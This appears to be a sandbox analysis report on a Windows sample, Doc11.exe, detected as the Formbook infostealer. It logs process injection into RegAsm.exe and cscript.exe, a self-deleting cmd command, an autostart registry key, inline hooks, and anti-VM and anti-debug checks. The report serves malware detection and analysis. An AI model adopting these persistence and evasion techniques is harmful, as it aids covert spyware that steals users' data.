Source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.194432972.0000000004178000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Doc11.exe.6320000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Doc11.exe.6320000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Doc11.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/4@3/4
Source: C:\Users\user\Desktop\Doc11.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Doc11.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5708:120:WilError_01
Source: Doc11.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Doc11.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Users\user\AppData\Roaming\7L8580B-\7L8logri.ini Jump to behavior
Source: C:\Users\user\Desktop\Doc11.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Doc11.exe Virustotal: Detection: 34%
Source: Doc11.exe ReversingLabs: Detection: 25%
Source: unknown Process created: C:\Users\user\Desktop\Doc11.exe 'C:\Users\user\Desktop\Doc11.exe'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: unknown Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Doc11.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Jump to behavior
Source: C:\Users\user\Desktop\Doc11.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe File written: C:\Users\user\AppData\Roaming\7L8580B-\7L8logri.ini Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Doc11.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Doc11.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cscript.pdbUGP source: RegAsm.exe, 00000002.00000002.227587280.0000000003010000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000002.00000002.227632586.0000000003100000.00000040.00000001.sdmp, cscript.exe, 00000006.00000002.443093817.0000000004CDF000.00000040.00000001.sdmp
Source: Binary string: RegAsm.pdb source: cscript.exe, 00000006.00000002.441341304.0000000000DA7000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: RegAsm.exe, cscript.exe
Source: Binary string: RegAsm.pdb4 source: cscript.exe, 00000006.00000002.441341304.0000000000DA7000.00000004.00000020.sdmp
Source: Binary string: cscript.pdb source: RegAsm.exe, 00000002.00000002.227587280.0000000003010000.00000040.00000001.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00417C5A push esp; iretd 2_2_00417C5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041CDF5 push eax; ret 2_2_0041CE48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041658D push ds; retf 2_2_004165D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041CE42 push eax; ret 2_2_0041CE48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041CE4B push eax; ret 2_2_0041CEB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004176EE push cs; retf 2_2_004176F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041CEAC push eax; ret 2_2_0041CEB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0317D0D1 push ecx; ret 2_2_0317D0E4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_04C3D0D1 push ecx; ret 6_2_04C3D0E4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B1DB5C push edi; ret 6_2_00B1DB5E
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B1DCA9 push 0D8910A8h; iretd 6_2_00B1DCAE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B17C5A push esp; iretd 6_2_00B17C5B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B1CDF5 push eax; ret 6_2_00B1CE48
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B1CEAC push eax; ret 6_2_00B1CEB2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B176EE push cs; retf 6_2_00B176F7
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B1CE42 push eax; ret 6_2_00B1CE48
Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_00B1CE4B push eax; ret 6_2_00B1CEB2
Source: initial sample Static PE information: section name: .text entropy: 7.85074481612

Boot Survival:

barindex
Creates an undocumented autostart registry key
Source: C:\Windows\SysWOW64\cscript.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 3FL0ZNGX9 Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xED
Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Doc11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe RDTSC instruction interceptor: First address: 00000000004098D4 second address: 00000000004098DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe RDTSC instruction interceptor: First address: 0000000000409B3E second address: 0000000000409B44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 0000000000B098D4 second address: 0000000000B098DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 0000000000B09B3E second address: 0000000000B09B44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00409A70 rdtsc 2_2_00409A70
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Doc11.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Doc11.exe TID: 4472 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 4968 Thread sleep time: -48000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 3276 Thread sleep time: -55000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: explorer.exe, 00000003.00000000.208172847.0000000007E80000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000000.191541658.0000000000DB8000.00000004.00000020.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}=1
Source: explorer.exe, 00000003.00000002.454870941.00000000059D0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000003.00000002.452746003.000000000474A000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.210149514.0000000007FBB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000003.00000002.452859301.00000000047E8000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.205152318.0000000006912000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.210095455.0000000007FAC000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m
Source: explorer.exe, 00000003.00000000.213997024.000000000E5C0000.00000004.00000001.sdmp Binary or memory string: TJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
Source: explorer.exe, 00000003.00000002.454870941.00000000059D0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000002.454870941.00000000059D0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.208055551.0000000007E03000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000003.00000002.454870941.00000000059D0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00409A70 rdtsc 2_2_00409A70
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03169A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_03169A00
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Doc11.exe Code function: 0_2_050001CB mov eax, dword ptr fs:[00000030h] 0_2_050001CB
Source: C:\Users\user\Desktop\Doc11.exe Code function: 0_2_050000AD mov ecx, dword ptr fs:[00000030h] 0_2_050000AD
Source: C:\Users\user\Desktop\Doc11.exe Code function: 0_2_050000AD mov eax, dword ptr fs:[00000030h] 0_2_050000AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E131B mov eax, dword ptr fs:[00000030h] 2_2_031E131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F8B58 mov eax, dword ptr fs:[00000030h] 2_2_031F8B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0312F358 mov eax, dword ptr fs:[00000030h] 2_2_0312F358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0312DB40 mov eax, dword ptr fs:[00000030h] 2_2_0312DB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03153B7A mov eax, dword ptr fs:[00000030h] 2_2_03153B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03153B7A mov eax, dword ptr fs:[00000030h] 2_2_03153B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0312DB60 mov ecx, dword ptr fs:[00000030h] 2_2_0312DB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03152397 mov eax, dword ptr fs:[00000030h] 2_2_03152397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0315B390 mov eax, dword ptr fs:[00000030h] 2_2_0315B390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031E138A mov eax, dword ptr fs:[00000030h] 2_2_031E138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03131B8F mov eax, dword ptr fs:[00000030h] 2_2_03131B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03131B8F mov eax, dword ptr fs:[00000030h] 2_2_03131B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031DD380 mov ecx, dword ptr fs:[00000030h] 2_2_031DD380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03154BAD mov eax, dword ptr fs:[00000030h] 2_2_03154BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03154BAD mov eax, dword ptr fs:[00000030h] 2_2_03154BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03154BAD mov eax, dword ptr fs:[00000030h] 2_2_03154BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F5BA5 mov eax, dword ptr fs:[00000030h] 2_2_031F5BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031A53CA mov eax, dword ptr fs:[00000030h] 2_2_031A53CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031A53CA mov eax, dword ptr fs:[00000030h] 2_2_031A53CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031503E2 mov eax, dword ptr fs:[00000030h] 2_2_031503E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031503E2 mov eax, dword ptr fs:[00000030h] 2_2_031503E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031503E2 mov eax, dword ptr fs:[00000030h] 2_2_031503E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031503E2 mov eax, dword ptr fs:[00000030h] 2_2_031503E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031503E2 mov eax, dword ptr fs:[00000030h] 2_2_031503E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031503E2 mov eax, dword ptr fs:[00000030h] 2_2_031503E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0314DBE9 mov eax, dword ptr fs:[00000030h] 2_2_0314DBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03125210 mov eax, dword ptr fs:[00000030h] 2_2_03125210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03125210 mov ecx, dword ptr fs:[00000030h] 2_2_03125210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03125210 mov eax, dword ptr fs:[00000030h] 2_2_03125210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03125210 mov eax, dword ptr fs:[00000030h] 2_2_03125210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0312AA16 mov eax, dword ptr fs:[00000030h] 2_2_0312AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0312AA16 mov eax, dword ptr fs:[00000030h] 2_2_0312AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03143A1C mov eax, dword ptr fs:[00000030h] 2_2_03143A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031EAA16 mov eax, dword ptr fs:[00000030h] 2_2_031EAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031EAA16 mov eax, dword ptr fs:[00000030h] 2_2_031EAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03138A0A mov eax, dword ptr fs:[00000030h] 2_2_03138A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03164A2C mov eax, dword ptr fs:[00000030h] 2_2_03164A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03164A2C mov eax, dword ptr fs:[00000030h] 2_2_03164A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031EEA55 mov eax, dword ptr fs:[00000030h] 2_2_031EEA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031B4257 mov eax, dword ptr fs:[00000030h] 2_2_031B4257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03129240 mov eax, dword ptr fs:[00000030h] 2_2_03129240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03129240 mov eax, dword ptr fs:[00000030h] 2_2_03129240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03129240 mov eax, dword ptr fs:[00000030h] 2_2_03129240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_03129240 mov eax, dword ptr fs:[00000030h] 2_2_03129240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0316927A mov eax, dword ptr fs:[00000030h] 2_2_0316927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031DB260 mov eax, dword ptr fs:[00000030h] 2_2_031DB260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031DB260 mov eax, dword ptr fs:[00000030h] 2_2_031DB260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031F8A62 mov eax, dword ptr fs:[00000030h] 2_2_031F8A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0315D294 mov eax, dword ptr fs:[00000030h] 2_2_0315D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0315D294 mov eax, dword ptr fs:[00000030h] 2_2_0315D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0313AAB0 mov eax, dword ptr fs:[00000030h] 2_2_0313AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0313AAB0 mov eax, dword ptr fs:[00000030h] 2_2_0313AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0315FAB0 mov eax, dword ptr fs:[00000030h] 2_2_0315FAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031252A5 mov eax, dword ptr fs:[00000030h] 2_2_031252A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031252A5 mov eax, dword ptr fs:[00000030h] 2_2_031252A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031252A5 mov eax, dword ptr fs:[00000030h] 2_2_031252A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031252A5 mov eax, dword ptr fs:[00000030h] 2_2_031252A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_031252A5 mov eax, dword ptr fs:[00000030h] 2_2_031252A5
